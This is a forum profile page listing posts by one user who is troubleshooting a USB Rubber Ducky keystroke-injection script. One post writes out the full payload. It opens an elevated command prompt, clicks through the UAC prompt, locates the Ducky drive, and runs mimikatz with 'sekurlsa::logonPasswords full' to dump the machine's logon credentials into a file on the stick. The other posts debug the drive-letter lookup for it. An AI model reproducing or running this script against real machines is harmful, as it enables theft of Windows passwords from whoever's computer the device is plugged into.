Jump to content

Mazer22

Active Members
  • Posts

    5
  • Joined

  • Last visited

Everything posted by Mazer22

  1. I dont know what to do. I broke up the strings like you suggested and now it cannot find the path to mimikatz im assuming. Mimikatz is on the sd card and opens fine so im guessing theres a problem with %duck% and it not finding the ducky?
  2. Hey thanks for the response im really new at this so I appreciate the help. I flashed it with the composite_duck_S003.hex because I wanted it to be HID and mass storage. I didnt change anything but this morning it seems to be entering that line and I have a new problem haha. Ill put another picture in. After it sets the drive it just enters d. Heres what im using DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y DELAY 500 STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "Ducky"') do set duck=%d ENTER DELAY 500 STRING %duck%\mimikatz.exe > %duck%\%computername%-passwords.txt ENTER DELAY 100 STRING priviledge::debug ENTER STRING sekurlsa::logonPasswords full ENTER
  3. So I found a script I wanted to run on the rubber ducky but when I run it the first line in cmd does not get entered. It just moves onto the next line without finding what drive it is in. When I had type the same line into cmd it works fine. I think it may be becasue the ducky isnt hitting ENTER or something. Anyone know what is going wrong here. Ill post a picture, the top is when the rubber ducky runs it and the bottom is hand typing it in. This is what I was trying to run: STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d DELAY 500 ENTER ?????
×
×
  • Create New...